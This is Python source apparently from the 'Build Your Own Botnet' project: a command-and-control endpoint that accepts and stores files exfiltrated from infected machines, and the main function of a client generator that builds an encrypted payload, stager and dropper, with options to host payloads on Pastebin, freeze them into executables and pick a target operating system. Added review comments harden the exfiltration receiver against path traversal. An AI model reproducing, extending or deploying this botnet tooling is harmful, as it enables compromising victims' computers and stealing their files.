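def file_add():
    """Upload new exfiltrated file.

    Reads ``data``, ``type``, ``owner``, ``module``, ``session`` and
    ``filename`` from ``request.form``, base64-decodes the payload, records
    the upload through ``file_dao.add_user_file`` and writes the bytes to
    ``<cwd>/buildyourownbotnet/output/<owner>/files/<filename>``.

    Every form field is supplied by the caller. ``owner``, ``filename`` and
    ``type`` all end up in the destination path, so each path component is
    accepted only as a single plain name and the resolved destination must
    stay inside the output root. Without that check a request could write
    an arbitrary file anywhere the server process can write.

    NOTE(review): no authentication, size limit or owner/session binding is
    visible in this function - confirm they are enforced by the route or a
    decorator outside this view.

    Returns:
        The stored file name, or ``None`` when the request is rejected.
    """
    b64_data = request.form.get('data')
    filetype = request.form.get('type')
    owner = request.form.get('owner')
    module = request.form.get('module')
    session = request.form.get('session')
    filename = request.form.get('filename')

    # decode any base64 values
    data = None
    if b64_data is not None:
        try:
            data = base64.b64decode(b64_data)
        except (ValueError, TypeError):
            # Fallback for values carrying a '_b64' marker; the first six
            # characters are skipped (presumably a six-character prefix -
            # confirm against the client). The result stays as bytes because
            # the file below is opened in binary mode.
            if b64_data.startswith('_b64'):
                try:
                    data = base64.b64decode(b64_data[6:])
                except (ValueError, TypeError):
                    data = None
    if data is None:
        # Bounded repr: the value is untrusted and may be large or contain
        # control characters that would corrupt the log.
        print('/api/file/add error: invalid data ' + repr(b64_data)[:64])
        return

    try:
        session = base64.b64decode(session)
    except (ValueError, TypeError):
        try:
            if session.startswith('_b64'):
                session = base64.b64decode(session[6:]).decode('ascii')
        except (ValueError, TypeError, AttributeError):
            # Best effort: keep the session value exactly as received.
            pass

    # add . to file extension if necessary
    if not filetype:
        filetype = '.dat'
    elif not filetype.startswith('.'):
        filetype = '.' + filetype

    # generate random filename if not specified
    if not filename:
        filename = generators.variable(length=3) + filetype

    # Reject anything that is not a single, plain path component. The check
    # runs after the name is generated because `filetype` is request data too.
    for label, part in (('owner', owner), ('filename', filename)):
        if (not part or part in ('.', '..') or '\x00' in part
                or '/' in part or '\\' in part or os.sep in part):
            print('/api/file/add error: invalid ' + label + ' '
                  + repr(part)[:64])
            return

    # Defence in depth: resolve symlinks and confirm the destination is still
    # inside the output root before anything is recorded or written.
    output_root = os.path.realpath(
        os.path.join(os.getcwd(), 'buildyourownbotnet/output'))
    output_path = os.path.realpath(
        os.path.join(output_root, owner, 'files', filename))
    try:
        contained = (
            os.path.commonpath([output_root, output_path]) == output_root)
    except ValueError:
        # commonpath raises when the paths cannot be compared
        # (e.g. different drives); treat that as outside the root.
        contained = False
    if not contained:
        print('/api/file/add error: path escapes output directory')
        return

    # add exfiltrated file to database
    file_dao.add_user_file(owner, filename, session, module)

    # save exfiltrated file to user directory
    with open(output_path, 'wb') as fp:
        fp.write(data)

    return filename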
def main(*args, **kwargs):
    """
    Run the generator

    With no keyword arguments the options are parsed from the command line;
    otherwise they are packed into an ``Options`` namedtuple built from
    ``*args`` and ``**kwargs``. The build helpers are then called in a fixed
    order, each receiving the results of the earlier ones, and the value
    returned by ``_dropper`` is returned to the caller.

    NOTE(review): the two branches yield differently shaped option objects
    (argparse exposes ``os`` and has no ``host``/``port``; the namedtuple
    exposes ``operating_system``, ``host`` and ``port``). The helpers are not
    visible here - confirm which attributes they read.

    """
    #util.display(globals()['__banner'], color=random.choice(list(filter(lambda x: bool(str.isupper(x) and 'BLACK' not in x), dir(colorama.Fore)))), style='normal')

    if kwargs:
        # Programmatic call: positional and keyword values fill the fields
        # in this order.
        option_fields = [
            'host', 'port', 'modules', 'name', 'icon', 'pastebin', 'encrypt',
            'compress', 'freeze', 'gui', 'owner', 'operating_system',
            'architecture',
        ]
        options = collections.namedtuple('Options',
                                         option_fields)(*args, **kwargs)
    else:
        cli = argparse.ArgumentParser(
            prog='client.py',
            description="Generator (Build Your Own Botnet)",
        )
        add_option = cli.add_argument

        add_option('modules', metavar='module', action='append', nargs='*',
                   help='module(s) to remotely import at run-time')
        add_option('--name', action='store', help='output file name')
        add_option('--icon', action='store', help='icon image file name')
        add_option('--pastebin', action='store', metavar='API',
                   help='upload the payload to Pastebin (instead of the C2 server hosting it)')
        add_option('--encrypt', action='store_true', default=False,
                   help="encrypt the payload with a random 128-bit key embedded in the payload's stager")
        add_option('--compress', action='store_true', default=False,
                   help='zip-compress into a self-extracting python script')
        add_option('--freeze', action='store_true', default=False,
                   help='compile client into a standalone executable for the current host platform')
        add_option('--gui', action='store_true', default=False,
                   help='generate client controllable via web browser GUI at https://buildyourownbotnet.com')
        add_option('--owner', action='store', default=False,
                   help='only allow the authenticated owner to interact with this client')
        add_option('--os', action='store', default='nix',
                   help='target operating system')
        add_option('--architecture', action='store', default='',
                   help='target architecture')
        add_option('-v', '--version', action='version', version='0.5')

        options = cli.parse_args()

    # hacky solution to make existing client generator script work with package structure for web app
    # The working directory is process-wide state; it is changed here and
    # stepped up one level at the end, and is not restored if a helper raises.
    os.chdir(ROOT)

    # 16 bytes from the OS CSPRNG, base64-encoded. Per the --encrypt help
    # text this key ships inside the stager, so whoever holds the stager also
    # holds the key: the encryption obscures the payload, it does not keep it
    # confidential from an analyst.
    key = base64.b64encode(os.urandom(16))
    var = generators.variable(3)

    # Accumulate the keyword arguments shared by every stage so each helper
    # sees exactly what the stages before it produced.
    stage_kwargs = {'var': var, 'key': key}
    stage_kwargs['modules'] = _modules(options, **stage_kwargs)
    stage_kwargs['imports'] = _imports(options, **stage_kwargs)
    stage_kwargs['hidden'] = _hidden(options, **stage_kwargs)

    payload = _payload(options, **stage_kwargs)
    stager = _stager(options, **stage_kwargs, url=payload)
    dropper = _dropper(options, **stage_kwargs, url=stager)

    os.chdir('..')

    return dropper